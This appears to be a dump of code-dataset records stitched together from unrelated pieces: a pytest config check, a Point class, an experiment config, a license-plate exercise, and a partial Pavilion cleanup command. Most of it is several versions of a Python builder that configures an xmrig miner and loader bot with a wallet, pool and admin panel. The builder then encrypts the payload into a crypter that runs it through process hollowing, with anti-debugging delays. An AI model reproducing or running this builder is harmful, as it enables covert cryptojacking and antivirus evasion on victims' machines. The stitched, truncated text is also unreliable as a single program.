1000);\n RunPortableExecutable(rawData);\n return 0;\n } \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n compileM(os.getcwd() + '\\\\src\\\\', 'ConsoleApplication1')\n xcopy(os.getcwd() + '\\\\src\\\\Release\\\\Crypter.exe', os.getcwd() +\n '\\\\' + name + '.exe')\n\n\n<mask token>\nload_userdata(u, p, w, l, a)\ncompile(os.getcwd() + '\\\\Bot\\\\', 'LoaderBot')\nxcopy(os.getcwd() + '\\\\Bot\\\\Miner\\\\bin\\\\Release\\\\LoaderBot.exe', 'Bot.exe')\ncompileR(os.getcwd() + '\\\\rig\\\\', 'xmrig')\nxcopy(os.getcwd() + '\\\\rig\\\\Release\\\\xmrig.exe', 'out.exe')\ncrypt('test', key)\nos.system('C:\\\\Python27\\\\python.exe cv.py')\nwriteBytes(key)\ncompileM(os.getcwd() + '\\\\Miner\\\\', 'winhost')\nxcopy(os.getcwd() + '\\\\Miner\\\\Release\\\\winhost.exe', 'in.exe')\nprint(os.getcwd() + '\\\\enc.exe')\nsubprocess.call(os.getcwd() + '\\\\enc.exe')\ncrypt('winhost', key)\nos.system('del file.txt')\nos.system('del in.exe')\nos.system('del out.exe')\nos.system('del decr.exe')\nos.system('del enc.exe')\nos.system('del test.exe')\n",
"step-4": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = \"\"\"\n #include <Windows.h>\n #include <winternl.h>\n #include <iostream>\n #include <string>\n #include <fstream>\n using namespace std;\n int main()\n {\n FILE * file = fopen(\"in.exe\", \"rb\");\n if (file == NULL) return 0;\n fseek(file, 0, SEEK_END);\n long int size = ftell(file);\n fclose(file);\n file = fopen(\"in.exe\", \"rb\");\n unsigned char * in = (unsigned char *)malloc(size);\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] - 0x0%n%;\n }\n file = fopen(\"out.exe\", \"wb\");\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] + 0x0%n%;\n }\n file = fopen(\"decr.exe\", \"wb\");\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n return 0;\n }\n \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n os.system('g++ -o enc encoder.cpp')\n os.system('C:\\\\Python27\\\\python.exe cv.py')\n with open('file.txt', 'r') as r:\n with open(os.getcwd() + '\\\\src\\\\crypter\\\\crypter.cpp', 'w') as w:\n txt = \"\"\" #include \"stdafx.h\"\n #include \"Crypter.h\"\n #include <windows.h>\n #include <winternl.h>\n #pragma comment(lib,\"ws2_32.lib\")\n #pragma comment(lib,\"ntdll.lib\")\n \"\"\" + r.read() + \"\"\" int RunPortableExecutable(void* Image) {\n IMAGE_DOS_HEADER* DOSHeader;\n IMAGE_NT_HEADERS* NtHeader;\n IMAGE_SECTION_HEADER* SectionHeader;\n PROCESS_INFORMATION PI;\n STARTUPINFOA SI;\n CONTEXT* CTX;\n DWORD* ImageBase;\n void* pImageBase;\n int count;\n char buffer[MAX_PATH];\n GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n char *CurrentFilePath = buffer;\n DOSHeader = PIMAGE_DOS_HEADER(Image);\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n ZeroMemory(&PI, sizeof(PI));\n ZeroMemory(&SI, sizeof(SI));\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n NtUnmapViewOfSection mNtUnmapViewOfSection;\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n CTX->ContextFlags = CONTEXT_FULL;\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n }\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n ResumeThread(PI.hThread);\n return 0;\n }\n }\n }\n }\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\n for (int i = 0; i < 550000; i++)\n OutputDebugStringW(L\"\");\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n unsigned char b = rawData[i] + 0x0%n%;\n rawData[i] = b;\n }\n Sleep(((rand() % 5 + 1) + 5) * 1000);\n RunPortableExecutable(rawData);\n return 0;\n } \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n compileM(os.getcwd() + '\\\\src\\\\', 'ConsoleApplication1')\n xcopy(os.getcwd() + '\\\\src\\\\Release\\\\Crypter.exe', os.getcwd() +\n '\\\\' + name + '.exe')\n\n\nkey = random.randint(1, 100)\nu = sys.argv[1]\nw = sys.argv[2]\np = sys.argv[3]\nl = sys.argv[4]\na = sys.argv[5]\nload_userdata(u, p, w, l, a)\ncompile(os.getcwd() + '\\\\Bot\\\\', 'LoaderBot')\nxcopy(os.getcwd() + '\\\\Bot\\\\Miner\\\\bin\\\\Release\\\\LoaderBot.exe', 'Bot.exe')\ncompileR(os.getcwd() + '\\\\rig\\\\', 'xmrig')\nxcopy(os.getcwd() + '\\\\rig\\\\Release\\\\xmrig.exe', 'out.exe')\ncrypt('test', key)\nos.system('C:\\\\Python27\\\\python.exe cv.py')\nwriteBytes(key)\ncompileM(os.getcwd() + '\\\\Miner\\\\', 'winhost')\nxcopy(os.getcwd() + '\\\\Miner\\\\Release\\\\winhost.exe', 'in.exe')\nprint(os.getcwd() + '\\\\enc.exe')\nsubprocess.call(os.getcwd() + '\\\\enc.exe')\ncrypt('winhost', key)\nos.system('del file.txt')\nos.system('del in.exe')\nos.system('del out.exe')\nos.system('del decr.exe')\nos.system('del enc.exe')\nos.system('del test.exe')\n",
"step-5": "import os, sys, time, random, subprocess\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open(\"D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp\", \"r\") as f:\n file = f.read()\n file = file.replace(\"%u%\", wallet)\n file = file.replace(\"%p%\", pool)\n file = file.replace(\"%w%\", ww)\n with open(\"D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp\", \"w\") as w:\n w.write(file)\n with open(os.getcwd()+\"\\\\Bot\\\\Miner\\\\ex.cs\", \"r\") as f:\n file = f.read()\n file = file.replace(\"%l%\", logger)\n file = file.replace(\"%a%\", adminka)\n with open(os.getcwd()+\"\\\\Bot\\\\Miner\\\\Program.cs\", \"w\") as w:\n w.write(file)\n\ndef writeBytes(key):\n with open(os.getcwd()+\"\\\\file.txt\", \"r\") as f:\n file = f.read()\n with open(os.getcwd()+\"\\\\Miner\\\\CryptRunPe\\\\winhost.cpp\", \"w\") as w:\n w.write(\"#include <stdafx.h>\\n#include \\\"process.h\\\"\\n #include \\\"memrun.h\\\"\\nusing namespace std;\\n\")\n with open(\"ex.txt\") as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\ndef compile(path, file):\n os.system(\"%windir%\\Microsoft.NET\\Framework\\\\v4.0.30319\\msbuild.exe \\\"\"+path+file+\".sln\\\" /p:Configuration=Release\")\n\t\ndef compileM(path, file):\n os.system(\"msbuild.exe \\\"\"+path+file+\".sln\\\" /p:Configuration=Release\")\n\ndef compileR(path, file):\n os.system(\"msbuild.exe \\\"\"+path+file+\".sln\\\" /p:Configuration=Release /p:Platform=\\\"WIN32\\\"\")\ndef xcopy(path, out):\n try:\n with open(path, \"rb\") as f:\n file = f.read()\n with open(out, \"wb\") as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = '\\n\\\n #include <Windows.h>\\n\\\n #include <winternl.h>\\n\\\n #include <iostream>\\n\\\n #include <string>\\n\\\n #include <fstream>\\n\\\n using namespace std;\\n\\\n int main()\\n\\\n {\\n\\\n FILE * file = fopen(\"in.exe\", \"rb\");\\n\\\n if (file == NULL) return 0;\\n\\\n fseek(file, 0, SEEK_END);\\n\\\n long int size = ftell(file);\\n\\\n fclose(file);\\n\\\n file = fopen(\"in.exe\", \"rb\");\\n\\\n unsigned char * in = (unsigned char *)malloc(size);\\n\\\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\\n\\\n fclose(file);\\n\\\n for (int i = 0; i < size; i++) {\\n\\\n in[i] = in[i] - 0x0%n%;\\n\\\n }\\n\\\n file = fopen(\"out.exe\", \"wb\");\\n\\\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\\n\\\n fclose(file);\\n\\\n for (int i = 0; i < size; i++) {\\n\\\n in[i] = in[i] + 0x0%n%;\\n\\\n }\\n\\\n file = fopen(\"decr.exe\", \"wb\");\\n\\\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\\n\\\n fclose(file);\\n\\\n return 0;\\n\\\n }\\n\\\n '\n txt = txt.replace(\"%n%\", str(key))\n w.write(txt)\n os.system(\"g++ -o enc encoder.cpp\")\n os.system(\"C:\\Python27\\python.exe cv.py\")\n with open('file.txt', 'r') as r:\n with open(os.getcwd()+\"\\\\src\\\\crypter\\\\crypter.cpp\", \"w\") as w:\n txt = '\\\n #include \"stdafx.h\"\\n\\\n #include \"Crypter.h\"\\n\\\n #include <windows.h>\\n\\\n #include <winternl.h>\\n\\\n #pragma comment(lib,\"ws2_32.lib\")\\n\\\n #pragma comment(lib,\"ntdll.lib\")\\n\\\n '+ r.read() + '\\\n int RunPortableExecutable(void* Image) {\\n\\\n IMAGE_DOS_HEADER* DOSHeader;\\n\\\n IMAGE_NT_HEADERS* NtHeader;\\n\\\n IMAGE_SECTION_HEADER* SectionHeader;\\n\\\n PROCESS_INFORMATION PI;\\n\\\n STARTUPINFOA SI;\\n\\\n CONTEXT* CTX;\\n\\\n DWORD* ImageBase;\\n\\\n void* pImageBase;\\n\\\n int count;\\n\\\n char buffer[MAX_PATH];\\n\\\n GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\\n\\\n char *CurrentFilePath = buffer;\\n\\\n DOSHeader = PIMAGE_DOS_HEADER(Image);\\n\\\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\\n\\\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\\n\\\n ZeroMemory(&PI, sizeof(PI));\\n\\\n ZeroMemory(&SI, sizeof(SI));\\n\\\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\\n\\\n NtUnmapViewOfSection mNtUnmapViewOfSection;\\n\\\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\\n\\\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\\n\\\n CTX->ContextFlags = CONTEXT_FULL;\\n\\\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\\n\\\n ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\\n\\\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\\n\\\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\\n\\\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\\n\\\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\\n\\\n SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\\n\\\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\\n\\\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\\n\\\n }\\n\\\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\\n\\\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\\n\\\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\\n\\\n ResumeThread(PI.hThread);\\n\\\n return 0;\\n\\\n }\\n\\\n }\\n\\\n }\\n\\\n }\\n\\\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\\n\\\n for (int i = 0; i < 550000; i++)\\n\\\n OutputDebugStringW(L\"\");\\n\\\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\\n\\\n unsigned char b = rawData[i] + 0x0%n%;\\n\\\n rawData[i] = b;\\n\\\n }\\n\\\n Sleep(((rand() % 5 + 1) + 5) * 1000);\\n\\\n RunPortableExecutable(rawData);\\n\\\n return 0;\\n\\\n }\\\n '\n txt = txt.replace(\"%n%\", str(key))\n w.write(txt)\n compileM(os.getcwd()+\"\\\\src\\\\\", \"ConsoleApplication1\")\n xcopy(os.getcwd() + \"\\\\src\\\\Release\\\\Crypter.exe\", os.getcwd()+\"\\\\\"+name+\".exe\")\n\nkey = random.randint(1, 100)\nu = sys.argv[1]\nw = sys.argv[2]\np = sys.argv[3]\nl = sys.argv[4]\na = sys.argv[5]\n\n\n\nload_userdata(u, p, w, l, a)\ncompile(os.getcwd()+\"\\\\Bot\\\\\", \"LoaderBot\")\nxcopy(os.getcwd()+\"\\\\Bot\\\\Miner\\\\bin\\\\Release\\\\LoaderBot.exe\", \"Bot.exe\")\ncompileR(os.getcwd()+\"\\\\rig\\\\\", \"xmrig\")\nxcopy(os.getcwd()+\"\\\\rig\\\\Release\\\\xmrig.exe\", \"out.exe\")\ncrypt(\"test\", key)\nos.system(\"C:\\Python27\\python.exe cv.py\")\nwriteBytes(key)\ncompileM(os.getcwd()+\"\\\\Miner\\\\\", \"winhost\")\nxcopy(os.getcwd()+\"\\\\Miner\\\\Release\\\\winhost.exe\", \"in.exe\")\nprint(os.getcwd()+\"\\\\enc.exe\")\nsubprocess.call(os.getcwd()+\"\\\\enc.exe\")\ncrypt(\"winhost\", key)\n\nos.system(\"del file.txt\")\nos.system(\"del in.exe\")\nos.system(\"del out.exe\")\nos.system(\"del decr.exe\")\nos.system(\"del enc.exe\")\nos.system(\"del test.exe\")\n",
"step-ids": [
6,
7,
8,
9,
11
]
}
|
[
6,
7,
8,
9,
11
] |
# testa se uma aplicacao em modo de teste esta sendo construida
def test_config(app):
assert app.testing
|
normal
|
{
"blob_id": "96d7963faf720a3dc0d96b55ad65ee7ac83c1818",
"index": 5798,
"step-1": "<mask token>\n",
"step-2": "def test_config(app):\n assert app.testing\n",
"step-3": "# testa se uma aplicacao em modo de teste esta sendo construida\ndef test_config(app):\n assert app.testing\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import math
class Point:
def __init__(self, x: int, y: int):
self.x = x
self.y = y
def create_point(self):
point = [self.x, self.y]
return point
@staticmethod
def calculate_distance(point_1: [], point_2: []):
side_a = abs(point_1.x - point_2.x)
side_b = abs(point_1.y - point_2.y)
side_c = math.sqrt(side_a ** 2 + side_b ** 2)
return side_c
n = int(input())
total_points = []
while n > 0:
n -= 1
a, b = [int(x) for x in input().split()]
point = Point(a, b).create_point()
total_points.append(point)
segment_list = []
for index_1 in range(len(total_points)):
for index_2 in range(len(total_points)):
if index_1 != index_2:
segment = Point(total_points[index_1][0], total_points[index_2][0])
segment_list.append(segment)
|
normal
|
{
"blob_id": "cda7595e46528739cad49a5d62a80bc7b2087157",
"index": 1911,
"step-1": "<mask token>\n\n\nclass Point:\n\n def __init__(self, x: int, y: int):\n self.x = x\n self.y = y\n\n def create_point(self):\n point = [self.x, self.y]\n return point\n\n @staticmethod\n def calculate_distance(point_1: [], point_2: []):\n side_a = abs(point_1.x - point_2.x)\n side_b = abs(point_1.y - point_2.y)\n side_c = math.sqrt(side_a ** 2 + side_b ** 2)\n return side_c\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Point:\n\n def __init__(self, x: int, y: int):\n self.x = x\n self.y = y\n\n def create_point(self):\n point = [self.x, self.y]\n return point\n\n @staticmethod\n def calculate_distance(point_1: [], point_2: []):\n side_a = abs(point_1.x - point_2.x)\n side_b = abs(point_1.y - point_2.y)\n side_c = math.sqrt(side_a ** 2 + side_b ** 2)\n return side_c\n\n\n<mask token>\nwhile n > 0:\n n -= 1\n a, b = [int(x) for x in input().split()]\n point = Point(a, b).create_point()\n total_points.append(point)\n<mask token>\nfor index_1 in range(len(total_points)):\n for index_2 in range(len(total_points)):\n if index_1 != index_2:\n segment = Point(total_points[index_1][0], total_points[index_2][0])\n segment_list.append(segment)\n",
"step-3": "<mask token>\n\n\nclass Point:\n\n def __init__(self, x: int, y: int):\n self.x = x\n self.y = y\n\n def create_point(self):\n point = [self.x, self.y]\n return point\n\n @staticmethod\n def calculate_distance(point_1: [], point_2: []):\n side_a = abs(point_1.x - point_2.x)\n side_b = abs(point_1.y - point_2.y)\n side_c = math.sqrt(side_a ** 2 + side_b ** 2)\n return side_c\n\n\nn = int(input())\ntotal_points = []\nwhile n > 0:\n n -= 1\n a, b = [int(x) for x in input().split()]\n point = Point(a, b).create_point()\n total_points.append(point)\nsegment_list = []\nfor index_1 in range(len(total_points)):\n for index_2 in range(len(total_points)):\n if index_1 != index_2:\n segment = Point(total_points[index_1][0], total_points[index_2][0])\n segment_list.append(segment)\n",
"step-4": "import math\n\n\nclass Point:\n\n def __init__(self, x: int, y: int):\n self.x = x\n self.y = y\n\n def create_point(self):\n point = [self.x, self.y]\n return point\n\n @staticmethod\n def calculate_distance(point_1: [], point_2: []):\n side_a = abs(point_1.x - point_2.x)\n side_b = abs(point_1.y - point_2.y)\n side_c = math.sqrt(side_a ** 2 + side_b ** 2)\n return side_c\n\n\nn = int(input())\ntotal_points = []\nwhile n > 0:\n n -= 1\n a, b = [int(x) for x in input().split()]\n point = Point(a, b).create_point()\n total_points.append(point)\nsegment_list = []\nfor index_1 in range(len(total_points)):\n for index_2 in range(len(total_points)):\n if index_1 != index_2:\n segment = Point(total_points[index_1][0], total_points[index_2][0])\n segment_list.append(segment)\n",
"step-5": null,
"step-ids": [
4,
5,
6,
7
]
}
|
[
4,
5,
6,
7
] |
#!/usr/bin/python3
experiment_name = "nodes10"
wall = "wall2"
wall_image = "irati_110"
mr_dif_policy = True
spn_dif_policy = True
destination_ip = "2001:40b0:7500:286:84:88:81:57"
|
normal
|
{
"blob_id": "78db25586f742b0a20bc3fad382b0d4f1a271841",
"index": 3970,
"step-1": "<mask token>\n",
"step-2": "experiment_name = 'nodes10'\nwall = 'wall2'\nwall_image = 'irati_110'\nmr_dif_policy = True\nspn_dif_policy = True\ndestination_ip = '2001:40b0:7500:286:84:88:81:57'\n",
"step-3": "#!/usr/bin/python3\n\nexperiment_name = \"nodes10\"\nwall = \"wall2\"\nwall_image = \"irati_110\"\nmr_dif_policy = True\nspn_dif_policy = True\ndestination_ip = \"2001:40b0:7500:286:84:88:81:57\"\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
speed, lic_plate = input().split()
salary = int(0)
while lic_plate != "A999AA":
if int(speed) > 60:
if lic_plate[1] == lic_plate[2] and lic_plate [2] == lic_plate[3]:
salary += 1000
elif lic_plate[1] == lic_plate[2] or lic_plate [1] == lic_plate[3]:
salary += 500
elif lic_plate[2] == lic_plate[3]:
salary += 500
else:
salary += 100
speed, lic_plate = input().split()
print(salary)
|
normal
|
{
"blob_id": "ff8ffeb418bf4f9bc7d5dadd126ebc7c34c5c2cd",
"index": 4454,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile lic_plate != 'A999AA':\n if int(speed) > 60:\n if lic_plate[1] == lic_plate[2] and lic_plate[2] == lic_plate[3]:\n salary += 1000\n elif lic_plate[1] == lic_plate[2] or lic_plate[1] == lic_plate[3]:\n salary += 500\n elif lic_plate[2] == lic_plate[3]:\n salary += 500\n else:\n salary += 100\n speed, lic_plate = input().split()\nprint(salary)\n",
"step-3": "speed, lic_plate = input().split()\nsalary = int(0)\nwhile lic_plate != 'A999AA':\n if int(speed) > 60:\n if lic_plate[1] == lic_plate[2] and lic_plate[2] == lic_plate[3]:\n salary += 1000\n elif lic_plate[1] == lic_plate[2] or lic_plate[1] == lic_plate[3]:\n salary += 500\n elif lic_plate[2] == lic_plate[3]:\n salary += 500\n else:\n salary += 100\n speed, lic_plate = input().split()\nprint(salary)\n",
"step-4": "speed, lic_plate = input().split()\nsalary = int(0)\nwhile lic_plate != \"A999AA\":\n if int(speed) > 60:\n if lic_plate[1] == lic_plate[2] and lic_plate [2] == lic_plate[3]:\n salary += 1000\n elif lic_plate[1] == lic_plate[2] or lic_plate [1] == lic_plate[3]:\n salary += 500\n elif lic_plate[2] == lic_plate[3]:\n salary += 500\n else:\n salary += 100\n speed, lic_plate = input().split()\nprint(salary)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class CleanCommand(commands.Command):
<|reserved_special_token_0|>
def __init__(self):
super().__init__('clean', 'Clean up Pavilion working directory.',
short_help='Clean up Pavilion working diretory.')
def _setup_arguments(self, parser):
parser.add_argument('-v', '--verbose', action='store_true', default
=False, help='Verbose output.')
parser.add_argument('--older-than', nargs='+', action='store', help
=
'Set the max age of files to be removed. Can be a date ex:"Jan 1 2019" or , or a number of days/weeks ex:"32 weeks"'
)
def run(self, pav_cfg, args):
"""Run this command."""
if args.older_than:
if 'day' in args.older_than or 'days' in args.older_than:
cutoff_date = datetime.today() - timedelta(days=int(args.
older_than[0]))
elif 'week' in args.older_than or 'weeks' in args.older_than:
cutoff_date = datetime.today() - timedelta(weeks=int(args.
older_than[0]))
elif 'month' in args.older_than or 'months' in args.older_than:
cutoff_date = get_month_delta(int(args.older_than[0]))
else:
date = ' '.join(args.older_than)
try:
cutoff_date = datetime.strptime(date, '%b %d %Y')
except (TypeError, ValueError):
output.fprint('{} is not a valid date.'.format(args.
older_than), file=self.errfile, color=output.RED)
return errno.EINVAL
else:
cutoff_date = datetime.today()
tests_dir = pav_cfg.working_dir / 'test_runs'
series_dir = pav_cfg.working_dir / 'series'
download_dir = pav_cfg.working_dir / 'downloads'
build_dir = pav_cfg.working_dir / 'builds'
dependent_builds = []
incomplete_tests = []
output.fprint('Removing Tests...', file=self.outfile, color=output.
GREEN)
for test in os.listdir(tests_dir.as_posix()):
test_time = datetime.fromtimestamp(os.path.getmtime((tests_dir /
test).as_posix()))
try:
test_obj = TestRun.load(pav_cfg, int(test))
status = test_obj.status.current().state
except (TestRunError, TestRunNotFoundError):
output.fprint('Removing bad test directory {}'.format(test),
file=self.outfile)
shutil.rmtree(tests_dir.as_posix())
continue
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed'.
format(err[1]), file=self.errfile, color=31)
if (test_time < cutoff_date and status != STATES.RUNNING and
status != STATES.SCHEDULED):
shutil.rmtree((tests_dir / test).as_posix())
if args.verbose:
output.fprint('Removed test {}'.format(test), file=self
.outfile)
else:
if args.verbose:
output.fprint('Skipped test {}'.format(test), file=self
.outfile)
incomplete_tests.append(test)
dependent_builds.append(test_obj.build_name)
completed_series = True
output.fprint('Removing Series...', file=self.outfile, color=output
.GREEN)
for series in os.listdir(series_dir.as_posix()):
try:
series_time = datetime.fromtimestamp(os.path.getmtime((
series_dir / series).as_posix()))
for test in incomplete_tests:
if os.path.exists((series_dir / series / test).as_posix()):
completed_series = False
if series_time < cutoff_date and completed_series:
shutil.rmtree((series_dir / series).as_posix())
if args.verbose:
output.fprint('Removed series {}'.format(series),
file=self.outfile)
elif args.verbose:
output.fprint('Skipped series {}'.format(series), file=
self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed'.
format(err[1]), file=self.errfile, color=31)
output.fprint('Removing Downloads...', file=self.outfile, color=
output.GREEN)
for download in os.listdir(download_dir.as_posix()):
try:
download_time = datetime.fromtimestamp(os.path.getmtime((
download_dir / download).as_posix()))
if download_time < cutoff_date:
try:
shutil.rmtree((download_dir / download).as_posix())
except NotADirectoryError:
output.fprint('{} is not a directory.'.format(
download), file=self.errfile, color=output.RED)
os.remove((download_dir / download).as_posix())
if args.verbose:
output.fprint('Removed download {}'.format(download
), file=self.outfile)
elif args.verbose:
output.fprint('Skipped download {}'.format(download),
file=self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed'.
format(err[1]), file=self.errfile, color=31)
output.fprint('Removing Builds...', file=self.outfile, color=output
.GREEN)
for build in os.listdir(build_dir.as_posix()):
try:
build_time = datetime.fromtimestamp(os.path.getmtime((
build_dir / build).as_posix()))
if build_time < cutoff_date and build not in dependent_builds:
shutil.rmtree((build_dir / build).as_posix())
if args.verbose:
output.fprint('Removed build {}'.format(build),
file=self.outfile)
elif args.verbose:
output.fprint('Skipped build {}'.format(build), file=
self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed. '.
format(err[1]), file=self.errfile, color=31)
return 0
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CleanCommand(commands.Command):
"""Cleans outdated test and series run directories."""
def __init__(self):
super().__init__('clean', 'Clean up Pavilion working directory.',
short_help='Clean up Pavilion working diretory.')
def _setup_arguments(self, parser):
parser.add_argument('-v', '--verbose', action='store_true', default
=False, help='Verbose output.')
parser.add_argument('--older-than', nargs='+', action='store', help
=
'Set the max age of files to be removed. Can be a date ex:"Jan 1 2019" or , or a number of days/weeks ex:"32 weeks"'
)
def run(self, pav_cfg, args):
"""Run this command."""
if args.older_than:
if 'day' in args.older_than or 'days' in args.older_than:
cutoff_date = datetime.today() - timedelta(days=int(args.
older_than[0]))
elif 'week' in args.older_than or 'weeks' in args.older_than:
cutoff_date = datetime.today() - timedelta(weeks=int(args.
older_than[0]))
elif 'month' in args.older_than or 'months' in args.older_than:
cutoff_date = get_month_delta(int(args.older_than[0]))
else:
date = ' '.join(args.older_than)
try:
cutoff_date = datetime.strptime(date, '%b %d %Y')
except (TypeError, ValueError):
output.fprint('{} is not a valid date.'.format(args.
older_than), file=self.errfile, color=output.RED)
return errno.EINVAL
else:
cutoff_date = datetime.today()
tests_dir = pav_cfg.working_dir / 'test_runs'
series_dir = pav_cfg.working_dir / 'series'
download_dir = pav_cfg.working_dir / 'downloads'
build_dir = pav_cfg.working_dir / 'builds'
dependent_builds = []
incomplete_tests = []
